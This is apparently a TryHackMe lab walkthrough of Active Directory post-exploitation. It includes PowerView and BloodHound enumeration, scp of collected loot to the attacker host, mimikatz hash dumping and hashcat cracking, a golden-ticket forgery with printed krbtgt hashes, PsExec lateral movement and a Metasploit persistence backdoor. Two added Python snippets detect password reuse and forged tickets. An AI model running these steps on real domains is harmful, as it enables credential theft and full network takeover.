kiwi

Just ssh with:

Your machine IP is 10.10.148.206 (yours will differ)
Username: Administrator
Password: P@$$W0rd
Domain Name: CONTROLLER

Then we start PowerShell with the execution policy bypassed: powershell -ep bypass

PowerView

Then load PowerView: . .\Downloads\PowerView.ps1

Domain users enumeration: Get-NetUser | select cn

cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{FLAG1_HERE}
sshd

Groups enumeration (admin groups): Get-NetGroup -GroupName *admin*

Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins

Further commands: see the PowerView cheatsheet here.

PS C:\Users\Administrator> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$     - Remote Admin
\\Domain-Controller.CONTROLLER.local\C$         - Default share
\\Domain-Controller.CONTROLLER.local\IPC$       - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON   - Logon server share
\\Domain-Controller.CONTROLLER.local\Share      -
\\Domain-Controller.CONTROLLER.local\SYSVOL     - Logon server share
PS C:\Users\Administrator> Get-NetComputer -fulldata | select operatingsystem

operatingsystem
---------------
Windows Server 2019 Standard
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation

Bloodhound

Install bloodhound and neo4j with apt.

In PowerShell, load SharpHound: . .\Downloads\SharpHound.ps1

Loot

PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
------------------------------------------------
Initializing SharpHound at 2:27 PM on 11/19/2021
------------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
PS C:\Users\Administrator> [+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 95 MB RAM
Status: 66 objects finished (+66 8)/s -- Using 99 MB RAM
Enumeration finished in 00:00:00.7080884
Compressing data to C:\Users\Administrator\20211119142703_loot.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 2:27 PM on 11/19/2021! Happy Graphing!

First, temporarily enable ssh on the attacking machine: sudo systemctl start ssh.socket. Then, from the remote machine, copy your loot over:

scp .\20211119152332_loot.zip nair0lf32@10.8.226.203:/home/nair0lf32/loot.zip

Start neo4j with sudo neo4j console (or sudo neo4j start), then launch bloodhound.

After logging in, open the hamburger menu and select 'Analysis'.

Mimikatz

Exit PowerShell with exit. Go to where mimikatz is and run it: cd Downloads && mimikatz.exe, then privilege::debug. The response should be Privilege '20' OK.

Then we dump the hashes:

lsadump::lsa /patch

Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105)
User : Admin2
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a

RID  : 00000454 (1108)
User : POST
LM   :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2

RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM   :
NTLM : 9f39a3b67c58269c707986cdaa1bb782

RID  : 00000455 (1109)
User : DESKTOP-2$
LM   :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c

RID  : 00000456 (1110)
User : DESKTOP-1$
LM   :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a

Then we crack them: hashcat -m 1000 <hash> rockyou.txt
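As an added example (not part of the original write-up): a small parser for the lsadump::lsa output above that flags what a defender reviewing such a dump looks for first, namely accounts that share an NTLM hash (above, Administrator and sshd both carry 2777b7fec870e04dda00cd7260f7bee6, so they use the same password) and accounts with no NTLM hash stored. The sample input is the page's own output, trimmed to three records.

```python
import re
from collections import defaultdict
# Constructed sample: three records copied from the lsadump::lsa /patch output above.
SAMPLE_DUMP = """\
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
"""

# One mimikatz record: RID line, User line, LM line, NTLM line (hash may be absent).
RECORD_RE = re.compile(
    r"RID\s+:\s+[0-9a-f]+ \((?P<rid>\d+)\)\nUser\s+:\s+(?P<user>\S+)\n"
    r"LM\s+:\s*(?P<lm>[0-9a-f]{32})?\nNTLM\s+:\s*(?P<ntlm>[0-9a-f]{32})?")

def parse_lsadump(text):
    """Return (rid, user, lm, ntlm) tuples; an empty hash field becomes None."""
    return [(int(m["rid"]), m["user"], m["lm"], m["ntlm"])
            for m in RECORD_RE.finditer(text)]

def find_shared_ntlm(records):
    """NTLM hashes held by more than one account, mapped to those accounts.
    NT hashes are unsalted, so an identical hash means an identical password."""
    by_hash = defaultdict(list)
    for _rid, user, _lm, ntlm in records:
        if ntlm:
            by_hash[ntlm].append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}

def find_empty_ntlm(records):
    """Accounts with no NTLM hash stored at all (here: the Guest account)."""
    return [user for _rid, user, _lm, ntlm in records if ntlm is None]

if __name__ == "__main__":
    recs = parse_lsadump(SAMPLE_DUMP)
    print("password reuse:", find_shared_ntlm(recs))  # Administrator and sshd
    print("no NTLM hash:", find_empty_ntlm(recs))     # ['Guest']
```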

Mimikatz Golden Ticket

Dump the hash of the krbtgt account (the Kerberos key distribution account) we identified earlier:

lsadump::lsa /inject /name:krbtgt

Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166

RID  : 000001f6 (502)
User : krbtgt

* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf
LM   :
Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

* WDigest

* Kerberos
Default Salt : CONTROLLER.LOCALkrbtgt
Credentials
des_cbc_md5       : 64ef5d43922f3b5d

* Kerberos-Newer-Keys
Default Salt : CONTROLLER.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
des_cbc_md5       (4096) : 64ef5d43922f3b5d

* NTLM-Strong-NTOWF
Random Value : 666caaaaf30081f30211bd7fa445fec4

From those values we can create a golden ticket. The general form is:

kerberos::golden /user: /domain: /sid: /krbtgt: /id:

In this case it gives:

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 11/19/2021 4:08:13 PM ; 11/17/2031 4:08:13 PM ; 11/17/2031 4:08:13 PM
-> Ticket : ticket.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

To use our ticket we run misc::cmd in mimikatz:

Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7D8DA43B8

This opens a new command prompt with elevated privileges on all machines (amazing). Exit mimikatz and try things like dir \\Desktop-1\c$ or PsExec.exe \\Desktop-1 cmd.exe. Normally those commands get executed, but TryHackMe doesn't allow networking here, so you get:

The network path was not found.
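A defender-side check, added here and not part of the original write-up: it reads the kerberos::golden summary printed above and lists why that ticket is distinguishable from a legitimate TGT (the ten-year lifetime against the default 10-hour ticket / 7-day renewal policy, the RC4 service key while the krbtgt dump above shows AES keys, and the privileged group RIDs written into the PAC). The policy values are the Default Domain Policy defaults and are an assumption; adjust them to the domain's own settings.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the kerberos::golden summary printed above, embedded verbatim.
SAMPLE_SUMMARY = """\
User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 11/19/2021 4:08:13 PM ; 11/17/2031 4:08:13 PM ; 11/17/2031 4:08:13 PM
"""

# Assumed Default Domain Policy values: user tickets live 10 hours, renewable for 7 days.
MAX_TGT = timedelta(hours=10)
MAX_RENEW = timedelta(days=7)
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}
TIME_FMT = "%m/%d/%Y %I:%M:%S %p"

def parse_summary(text):
    """Turn 'Label : value' lines into a dict keyed by the stripped label."""
    fields = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    return fields

def assess_ticket(text):
    """Return the reasons a ticket with these properties looks forged (empty = none)."""
    f = parse_summary(text)
    reasons = []
    start, end, renew = (datetime.strptime(t.strip(), TIME_FMT)
                         for t in f["Lifetime"].split(";"))
    if end - start > MAX_TGT:
        reasons.append(f"ticket lifetime {end - start} exceeds policy maximum {MAX_TGT}")
    if renew - start > MAX_RENEW:
        reasons.append(f"renewal window {renew - start} exceeds policy maximum {MAX_RENEW}")
    if f["ServiceKey"].endswith("rc4_hmac_nt"):
        reasons.append("service key is RC4 (rc4_hmac_nt) although krbtgt has AES keys: downgrade")
    rids = {int(r.lstrip("*")) for r in f["Groups Id"].split()}
    hits = sorted(PRIVILEGED_RIDS[r] for r in rids & set(PRIVILEGED_RIDS))
    if hits:
        reasons.append("PAC asserts membership in " + ", ".join(hits))
    return reasons

if __name__ == "__main__":
    for r in assess_ticket(SAMPLE_SUMMARY):
        print("[!]", r)
```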

Server Manager

RDP to the machine: xfreerdp /u:CONTROLLER\Administrator /p:P@$$W0rd /v:10.10.2.124

If there is any issue with the xfreerdp login, remove /p: and paste the password manually at the prompt. In Server Manager, navigate to the Tools tab and select Active Directory Users and Computers; user accounts may have the service account passwords set inside the description field.

Backdoors

After gaining access, Metasploit has a module for persistent backdoors:

exploit/windows/local/persistence

Here you can see the session die; however, the second we run the handler again we get a meterpreter shell back, thanks to the persistence service.

There are other ways of maintaining access, such as adding users and rootkits; however, I will leave you to do your own research and labs on those topics.